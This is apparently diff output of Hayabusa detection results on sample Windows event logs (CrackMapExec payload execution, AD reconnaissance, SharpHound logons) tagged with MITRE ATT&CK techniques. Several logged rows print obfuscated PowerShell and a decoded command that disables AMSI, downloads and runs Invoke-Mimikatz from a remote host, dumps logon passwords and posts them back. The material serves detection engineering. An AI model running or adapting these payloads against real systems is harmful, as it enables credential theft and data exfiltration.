101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:32:55.804 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,". ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}101d116,46t83d101A114d118A105A99A101W80N111N105N110N116d77}97A110z97}103z101A114N93,58A58N83d101}114}118t101t114}67A101t114A116N105W102}105,99A97t116}101,86}97}108W105W100z97}116,105}111}110W67,97N108A108}98}97}99A107,32A61t32N123t36}116,114A117}101A125N10A116A114A121}123}10}91}82W101W102A93A46d65}115,115}101d109t98,108t121t46}71z101N116N84t121z112d101d40t39z83N121d115z39}43z39t116N101A109d46}77d97d110N39A43z39W97d103W101W109t101}110N116W46d65A117z116z39W43d39}111d109A97z116}105A111z110z46W65A109}39z43A39}115t105}85t116}39N43z39d105A108A115t39z41N46W71W101}116z70d105N101A108t100,40}39,97}109d39A43W39z115}105}73d110}105}39d43t39A116t70t97N105N108}101d100A39z44z32N39W78A111A110z80W39z43d39,117t98N108}105t99}44N83,116W97}39}43A39}116W105,99W39}41z46A83N101,116z86d97}108t117N101z40A36N110d117A108A108z44N32}36}116}114,117A101N41W10,125,99}97A116A99,104d123t125A10}91t78t101}116,46,83d101W114z118}105N99A101d80A111,105t110}116W77,97N110d97,103A101}114W93}58t58}83A101d114z118t101A114A67N101W114d116,105N102d105N99}97,116W101z86t97}108}105A100A97,116z105A111z110}67W97d108d108}98}97z99,107N32N61,32,123}36d116t114}117}101N125}10N91A83}121,115A116}101z109A46}78}101W116N46A83}101,114,118,105}99N101,80,111A105z110A116A77A97,110N97t103t101t114}93}58d58t83N101t99,117d114z105A116d121,80}114,111}116,111}99A111W108W32}61A32W91W83z121W115}116t101}109d46}78A101t116N46t83N101A99}117d114W105d116A121}80d114W111t116z111}99d111z108}84z121N112z101,93A39,83A115z108,51d44W84}108z115A44N84A108t115A49W49N44,84}108}115N49d50,39W10t73t69t88W32}40A78A101A119A45A79d98d106t101z99}116A32W78}101W116t46}87,101N98A67,108A105d101}110d116,41A46z68d111N119N110z108A111}97A100z83t116A114A105A110,103,40A39d104d116N116N112A115t58A47N47z49}48z46,50}51A46}49d50t51N46}49A49A58N52}52}51W47}73W110A118}111A107}101N45t77}105A109}105,107W97t116z122z46,112t115}49A39,41d10t36d99t109z100t32W61d32t73}110,118,111}107d101W45W77z105}109}105,107d97z116d122W32d45t67z111A109W109}97d110t100t32A39,112A114}105N118W105}108N101}103z101N58,58t100d101t98z117t103W32W115W101}107t117d114z108A115}97,58N58W108A111A103A111}110A112A97A115N115z119d111}114d100A115N32N101,120}105}116z39}10,36A114}101z113d117N101}115t116N32d61t32A91}83d121A115W116W101d109t46N78t101A116A46}87z101W98z82t101W113d117A101t115d116d93d58N58W67,114}101d97A116}101z40}39N104N116}116t112,115W58t47d47N49A48d46}50A51A46}49,50N51N46}49A49,58t52d52}51}47}39}41A10z36N114}101z113z117N101A115W116A46d77t101W116W104A111t100,32,61z32,39d80,79,83W84d39z10}36t114A101t113d117W101t115N116z46d67}111A110t116z101z110}116t84d121}112A101}32A61t32A39z97d112W112W108}105,99N97d116t105}111z110z47}120}45A119t119z119}45N102,111N114}109A45d117A114t108z101N110A99A111}100}101A100z39A10t36z98}121,116A101z115A32A61}32}91N83}121A115W116N101d109A46}84}101W120N116}46N69,110}99W111W100}105t110,103A93,58A58z65z83W67d73t73W46A71N101}116t66}121,116A101}115A40,36N99A109A100A41z10A36A114z101A113}117,101N115A116W46,67d111d110z116z101t110A116}76}101z110t103}116A104,32}61t32N36d98,121N116z101}115N46}76z101N110,103z116W104}10A36d114d101A113N117}101A115d116}83z116A114A101,97N109z32,61}32}36}114W101t113N117,101W115A116}46A71}101W116A82z101A113A117N101t115N116t83A116A114}101d97d109}40}41t10z36A114t101d113A117}101A115A116A83N116}114d101}97W109A46,87z114d105,116A101,40}36W98N121z116z101t115}44A32z48}44d32}36A98W121t116A101}115W46,76N101t110W103}116,104t41d10A36z114N101}113A117}101}115d116}83A116N114t101W97W109W46,67}108}111}115d101t40t41A10z36W114}101t113t117N101A115N116t46d71t101W116}82W101z115}112}111A110d115}101}40,41'.SPlIT('Nz}tAdA,}W') | ForEach-ObJEct { ([int] $_ -AS [ChAR]) } ) +$( set-itEM 'VaRiAble:Ofs' ' ' ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:55.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Variable): ""Set-Variable"" ParameterBinding(Set-Variable): name=""Name""; value=""Ofs"" ParameterBinding(Set-Variable): name=""Value""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:55.942 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ ([int] $_ -AS [ChAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:56.691 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Item): ""Set-Item"" ParameterBinding(Set-Item): name=""Path""; value=""VaRiAble:Ofs"" ParameterBinding(Set-Item): name=""Value""; value="" """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Invoke-Expression): ""Invoke-Expression"" ParameterBinding(Invoke-Expression): name=""Command""; value=""[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('https://10.23.123.11:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://10.23.123.11:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()"" TerminatingError(Invoke-Expression): ""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.253 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.255 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.274 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.369 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.422 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.450 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.469 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.477 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-String): ""Out-String"" CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""Transcript""; value=""True"" ParameterBinding(Out-String): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software."" ParameterBinding(Out-Default): name=""InputObject""; value=""Invoke-Expression : At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + . ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}10 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.512 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.513 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.522 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.524 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.556 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.597 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.626 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
+2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
+2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
